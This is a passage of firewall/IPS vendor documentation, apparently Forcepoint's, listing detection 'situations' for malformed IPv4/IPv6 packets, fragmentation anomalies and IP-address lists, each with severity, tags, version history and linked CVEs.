Description: The IPv6 option's data length value is not correct. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Option-misaligned

About this situation: IPv6 option is misaligned
Context: IPv6 without parameters
Severity: 5
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-TCP-IP-Denial-Of-Service-CVE-2021-24086
Description: The IPv6 option is misaligned with respect to the start of the extension header. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Option-not-allowed-in-destination-options

About this situation: IPv6 option is not allowed in the destination options header
Context: IPv6 without parameters
Severity: 5
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The IPv6 option is not allowed in the destination option header. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Option-not-allowed-in-hop-by-hop-options

About this situation: IPv6 option is not allowed in the hop-by-hop options header
Context: IPv6 without parameters
Severity: 5
Tags: Potential Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1475-5242
Description: An IPv6 packet's Hop-by-Hop Options header contains an IPv6 option which is not allowed in the header. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Reassembled-Payload-Too-Large

About this situation: Reassembled IPv6 payload is too large
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An IPv6 fragment contained data that would result into a too large reassembled payload. The size of a reassembled IPv6 payload can be at most 65,535 bytes [RFC 2460]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Recursive-Fragmentation

About this situation: Recursive IPv6 fragmentation
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Description: An IPv6 packet contains recursive fragmentation. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Routing-header-type-0

About this situation: IPv6 Routing header type 0 is present
Context: IPv6 without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The Routing header type 0 is present in an IPv6 datagram. This header type is deprecated by RFC 5095, and is considered a possible denial of service attack. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Routing-header-type-2

About this situation: IPv6 Routing header type 2 is present
Context: IPv6 without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-201-2032
Description: The Routing header type 2 is present in an IPv6 datagram. This header type is defined in RFC 3775 and is used for Mobile IPv6.
Back to top

IPv6_Routing-header-type-unknown

About this situation: IPv6 Routing header of unknown type was detected
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Vulnerability: Microsoft-TCP-IP-Denial-Of-Service-CVE-2021-24086
Description: The Routing header is present in an IPv6 datagram, but its type is unknown. Currently specified types are 0 (deprecated in RFC 5095) and 2 (defined in RFC 3775). Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Routing-segments-left-inconsistency

About this situation: IPv6 routing header's segments left value is inconsisten with its type or length
Context: IPv6 without parameters
Severity: 5
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The IPv6 routing header's segments left value is inconsistent with its type or length. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Generic IPv6 Fingerprinting Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1289-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

IPv6_Unknown-ICMPv6-Message-Type

About this situation: An ICMPv6 package with an unknown message type was detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, Squid, CVE2014, Linux not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Squid-Pinger-Denial-Of-Service
Description:
Back to top

IPv6_Version-Not-6

About this situation: IPv6 header's version field doesn't have value 6
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: IPv6 header's version field doesn't have value 6. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_X41nop-Shellcode

About this situation: A potential attempt to exploit Microsoft Windows detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1287-5242
Description:
Back to top

IP_Addresses-Same

About this situation: Source and destination IP address are the same
Context: IP without parameters
Severity: 2
Tags: Potential Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-1475-5242
Description: The source and destination addresses were the same in an IPv4 header. This type of IPv4 datagram should not be generated according to the TCP/IP specifications. Risk analysis: Risk level is medium. The packet was probably crafted manually for address spoofing. Note: "IP source" must be spoofed and therefore it is not helpful in determining source of the attack. Most relevant log fields: "IP destination" shows the destination address in the IP datagram. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Akamai

About this situation: Akamai IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Description: A situation for IP addresses matching to known Akamai hosts.
Back to top

IP_Amazon

About this situation: Amazon IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon IP addresses.
Back to top

IP_Amazon_Appflow

About this situation: Amazon Appflow IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1266-5242
Last changed: sgpkg-ips-1266-5242
Description: A situation to match known Amazon Appflow IP addresses.
Back to top

IP_Amazon_Chime_Meetings

About this situation: Amazon Chime Meetings IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1266-5242
Last changed: sgpkg-ips-1266-5242
Description: A situation to match known Amazon Chime Meetings IP addresses.
Back to top

IP_Amazon_Chime_Voiceconnector

About this situation: Amazon Chime Voiceconnector IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1266-5242
Last changed: sgpkg-ips-1266-5242
Description: A situation to match known Amazon Chime Voiceconnector IP addresses.
Back to top

IP_Amazon_Cloud9

About this situation: Amazon Cloud9 IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1060-5242
Last changed: sgpkg-ips-1060-5242
Description: A situation to match known Amazon Cloud9 IP addresses.
Back to top

IP_Amazon_CloudFront

About this situation: Amazon CloudFront IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon CloudFront IP addresses.
Back to top

IP_Amazon_CodeBuild

About this situation: Amazon CodeBuild IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon CodeBuild IP addresses.
Back to top

IP_Amazon_ec2

About this situation: Amazon EC2 IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon EC2 IP addresses.
Back to top

IP_Amazon_GlobalAccelerator

About this situation: Amazon GlobalAccelerator IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Description: A situation to match known Amazon GlobalAccelerator IP addresses.
Back to top

IP_Amazon_Route53

About this situation: Amazon Route 53 IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon Route 53 IP addresses.
Back to top

IP_Amazon_Route53_Healthchecks

About this situation: Amazon Route 53 Healthchecks IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon Route 53 Healthchecks IP addresses.
Back to top

IP_Amazon_S3

About this situation: Amazon S3 IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: A situation to match known Amazon S3 IP addresses.
Back to top

IP_Apple

About this situation: Apple IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-939-5242
Last changed: sgpkg-ips-939-5242
Description: A situation for IP addresses matching to known Apple hosts.
Back to top

IP_Azure_Front_Door_Frontend

About this situation: Microsoft Azure service for Azure Front Door Frontend IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1871-5242
Last changed: sgpkg-ips-1871-5242
Description: A situation for IP addresses matching to Microsoft Azure service for Azure FrontDoor Frontend
Back to top

IP_Azure_IoT_Hub

About this situation: Microsoft Azure service for Azure IoT Hub IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1871-5242
Last changed: sgpkg-ips-1871-5242
Description: A situation for IP addresses matching to Microsoft Azure service for AzureIoTHub
Back to top

IP_Azure_Security_Center

About this situation: Microsoft Azure service for Azure Security Center matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1871-5242
Last changed: sgpkg-ips-1871-5242
Description: A situation for IP addresses matching to Microsoft Azure service for Azure Security Center
Back to top

IP_Bluejeans-Network-IP-Address-List

About this situation: Bluejeans Network IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1176-5242
Description: A situation to match known Bluejeans Network IP Addresses.
Back to top

IP_Botnet-Sites

About this situation: Botnet site IP address matched
Context: IP list ID for source or destination address
Severity: 8
Tags: Potential Botnet
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1223-5242
Description: A situation to match suspected botnet site IP addresses. The IP list is not a proper replacement for a URL reputation service.
Back to top

IP_Checksum-Mismatch

About this situation: IPv4 header checksum incorrect
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 header checksum is incorrect. Such a packet should never be generated or accepted by the receiver. IPv4 packets with incorrect checksums typically result from faulty networking devices or random errors in the network communications. Risk analysis: Risk level is fairly low. Hosts ignore IPv4 packets with erroneous checksums, so it is unlikely that this event is harmful. Most relevant log fields: "IP checksum" shows the checksum in the IPv4 header. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Cloudflare

About this situation: Cloudflare IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Description: A situation to match known Cloudflare IP addresses.
Back to top

IP_Code-42

About this situation: Code 42 IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Description: A situation to match known IP addesses used by Code 42.
Back to top

IP_Datagram-Discarded

About this situation: IP datagram was discarded according to access rules
Context: A not allowed IP datagram was received
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The access rules specified that the IP datagram received was not allowed. The datagram was received from an inline interface and it will not be forwarded or further inspected.
Back to top

IP_Datagram-Fragment-Middle

About this situation: IPv4 datagram carrying TCP is fragmented into 3+ fragments
Context: IP without parameters
Severity: 1
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: The IPv4 datagram carrying a TCP segment is fragmented into 3+ fragments. This situation occurs when a fragmented IP datagram is seen that is neither the first nor the last fragment of the datagram. Typically, avoiding unnecessary fragmentation improves networking performance. For example, TCP is able to avoid fragmentation, which makes fragmented IP datagrams relatively rare. Risk analysis: Risk level is none. Fragmentation commonly occurs in IP tunneling and when communicating over networks with different MTUs. Fragmentation alone does not signal an attack. However, fragmentation-related vulnerabilities and evasion techniques are common. Fragmentation could be used to bypass packet filters, or to make the traffic appear ambiguous to intrusion detection systems.
Back to top

IP_Datagram-Fragmented

About this situation: IPv4 datagram is fragmented
Context: IP without parameters
Severity: 1
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-454-4333
Description: The IPv4 datagram is fragmented. This situation occurs when a fragmented IP datagram is seen. Typically, avoiding unnecessary fragmentation improves networking performance. For example, TCP is able to avoid fragmentation, which makes fragmented IP datagrams relatively rare. Risk analysis: Risk level is none. Fragmentation commonly occurs with UDP traffic, in IP tunneling, and when communicating over networks with different MTUs. Fragmentation alone does not signal an attack. However, fragmentation-related vulnerabilities and evasion techniques are common. Fragmentation could be used to bypass packet filters, or to make the traffic appear ambiguous to intrusion detection systems.
Back to top

IP_Datagram-Fragments-Flags-Conflict

About this situation: IPv4 datagram fragments do not agree on flags
Context: IP without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 datagram is fragmented and the fragments claim conflicting ending of the datagram. This fragment claims that there are more fragments beyound this point, although the previous fragment has already set the datagram end. Alternatively, this fragment claims to be the last fragment, although data was already received beyond the end of this fragment. Risk analysis: Risk level is medium. Typically, this situation occurs when an attacker attempts to evade detection by sending fragmented packets with conflicting sizes. This could be used to bypass packet filters, or to make the traffic appear ambiguous for intrusion detection. However, it is also possible that NATed and fragmented packets from different hosts will match this situation. Most relevant log fields: "IP datagram length" shows the IPv4 datagram length according to the claimed last fragment. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Datagram-Received

About this situation: IP datagram was received
Context: An IP datagram was received
Severity: 1
Tags: Access
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The access rules specified that the IP datagram received was allowed. The datagram will be processed according to further access rules.
Back to top

IP_Datagram-Refused

About this situation: IP datagram was refused according to access rules
Context: Sensor engine situation
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The access rules specified that the IP datagram received was not allowed and had to be responded with ICMP error. The datagram was received from an inline interface and it will not be forwarded or further inspected.
Back to top

IP_DroidVPN-Server

About this situation: DroidVPN server IP address matched
Context: IP list ID for destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-855-5242
Last changed: sgpkg-ips-855-5242
Description: A situation to match known DroidVPN server IP addresses.
Back to top

IP_Facebook

About this situation: Facebook IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Description: A situation to match known Facebook IP addresses.
Back to top

IP_Fragment-Invalid-Size

About this situation: IPv4 fragment has invalid size
Context: IP without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Vulnerability: ICMP-Microsoft-Windows-Kernel-ICMP-Fragmented-Packet-DOS
Description: The IPv4 fragment has an invalid size. All but the last fragment should have a fragment payload length divisible by 8. Risk analysis: Risk level is medium. Most current systems are no longer vulnerable to these fragment attacks, as they silently drop these packets. Note: The "IP source" is often spoofed in these types of attacks. Most relevant log fields: "IP total length" shows the IP datagram length. "IP fragment offset" shows the Fragment Offset of the IP datagram. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Fragment-Offset-Overflow

About this situation: IPv4 Fragment Offset too large
Context: IP without parameters
Severity: 6
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-513-5211
Description: The detected IPv4 Fragment Offset is too large. The total fragment length would overflow the maximum IP datagram length or the fragment size would be illegal. Risk analysis: Risk level is medium. These types of IPv4 fragments have been used in many denial of service attacks, such as Ping-of-Death [CVE-1999-0128]. Most current systems are no longer vulnerable to these fragment attacks, as they silently drop these packets. Most relevant log fields: "IP total length" shows the IP datagram length. "IP fragment offset" shows the Fragment Offset of the IP datagram. Note: The "IP source" is often spoofed in these types of attacks. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Fragment-Size-Zero

About this situation: IPv4 fragment has zero size
Context: IP without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Vulnerability: Linux-Kernel-IPv6-Netfilter-Nf_CT_frag6_reasm-Null-Pointer-Dereference-DoS
Description: An IPv4 fragment with the length of zero bytes was detected. Risk analysis: Risk level is medium. These kinds of fragments can cause denial of service on some IP reassembly implementations, such as [CAN-1999-0431]. Most current systems are no longer vulnerable to these attacks, as they silently drop these packets. Most relevant log fields: Note: "IP source" is often spoofed in these types of attacks. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Fragment-Time-To-Live-Varies

About this situation: IP Fragments belonging to a datagram had different TTL
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-561-5211
Description: Fragments belonging to an IPv4 datagram had different Time To Live (TTL) values. IP fragments belonging to the same datagram are usually sent over the same route and could be expected to have the same TTL. Varying TTL values could indicate an evasion attempt. Risk analysis: Risk level is fairly low. Most relevant log fields: "IP source" shows the source IP address in the datagram. "IP destination" shows the destination IP address in the datagram. "IP TTL / hop limit" shows two different TTL values. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Fragments-Content-Conflict

About this situation: IPv4 datagram fragments have conflicting bytes
Context: IP without parameters
Severity: 6
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-391-4219
Description: An IPv4 datagram is fragmented and the fragments have conflicting, overlapping bytes. Risk analysis: Risk level is medium. Typically, this situation occurs when an attacker tries to exploit weaknesses in some network devices. This could be used to bypass packet filters, or to make the traffic appear ambiguous for intrusion detection. However, it is also possible that NATed and fragmented packets from different hosts will match this situation. Most relevant log fields: "IP frag different bytes" shows the number of conflicting bytes in the fragments. "IP frag different bytes first" shows the location of the first differing byte in the fragments. "IP frag different bytes last" shows the location of the last differing byte in the fragments. Notice: An attempt to bypass packet filtering by changing the TCP Options uses "IP frag different bytes first" that is less than 9 and the "IP frag different bytes last" that is greater than 9.
Back to top

IP_Fragments-Size-Conflict

About this situation: IPv4 datagram fragments have conflicting sizes
Context: IP without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 datagram is fragmented and the fragments claim different datagram sizes. Risk analysis: Risk level is medium. Typically, this situation occurs when an attacker attempts to evade detection by sending fragmented packets that claim different total lengths of the IP datagram. This could be used to bypass packet filters, or to make the traffic appear ambiguous for intrusion detection. However, it is also possible that NATed and fragmented packets from different hosts will match this situation. Most relevant log fields: "IP datagram length" shows the IPv4 datagram length according to the previously received last fragment. "IP datagram new length" shows the IPv4 datagram length according to the new recently received last fragment. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Google

About this situation: Google IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-816-5242
Description: A situation to match known Google IP addresses.
Back to top

IP_Header-Length-Error

About this situation: IPv4 packet with erroneous header length
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: The IPv4 datagram header length is shorter than 20 bytes, which is the minimum for an IPv4 header. Alternatively, the IP header length exceeds the data length of the Ethernet frame. This type of IPv4 datagram should not be generated according to the TCP/IP specifications. The packet was either corrupted in transit or it was crafted manually. Such a packet should not be accepted by the receiving host or forwarded by any intermediate router. Risk analysis: Risk level is low. Some hosts that do not properly check the IP datagram header length could be vulnerable to a denial of service or execution of arbitrary code. Most relevant log fields: "IP header length" shows the header length value in 32-bit words. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IP_Incapsula

About this situation: Incapsula IP matched
Context: IP list ID for source or destination address
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1301-5242
Last changed: sgpkg-ips-1301-5242
Description: A situation to match known Incapsula IP addresses.
Back to top

IP_Length-Inconsistency

About this situation: IP packet with extra padding
Context: IP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Vulnerability: Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow
